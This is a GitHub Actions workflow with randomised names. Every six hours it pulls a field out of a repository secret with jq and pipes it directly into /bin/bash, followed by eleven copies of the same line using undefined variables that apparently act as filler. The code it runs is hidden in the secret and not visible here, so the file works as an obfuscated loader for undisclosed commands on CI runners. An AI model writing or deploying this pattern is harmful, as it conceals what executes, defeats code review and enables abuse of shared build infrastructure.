name: meilitong3214
on:
  workflow_dispatch:
  schedule:
    - cron: '55 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meilitong3214
        env:
          xsurq103: ${{ secrets.xsurq103 }}
        run: |
          echo $xsurq103 | jq -r .hvdo2 | /bin/bash
          echo $u68204 | jq -r .v7607 | /bin/bash
          echo $zn54 | jq -r .uba95896 | /bin/bash
          echo $hch681 | jq -r .xdux08310 | /bin/bash
          echo $nv804 | jq -r .bex83 | /bin/bash
          echo $rxvd59160 | jq -r .wxzrg49 | /bin/bash
          echo $ebx23269 | jq -r .yqfjs96 | /bin/bash
          echo $sxbnv40615 | jq -r .vsp261 | /bin/bash
          echo $yriu21488 | jq -r .jh62321 | /bin/bash
          echo $qgq0980 | jq -r .ereh2925 | /bin/bash
          echo $dn31 | jq -r .ga375 | /bin/bash
          echo $o541 | jq -r .s8 | /bin/bash

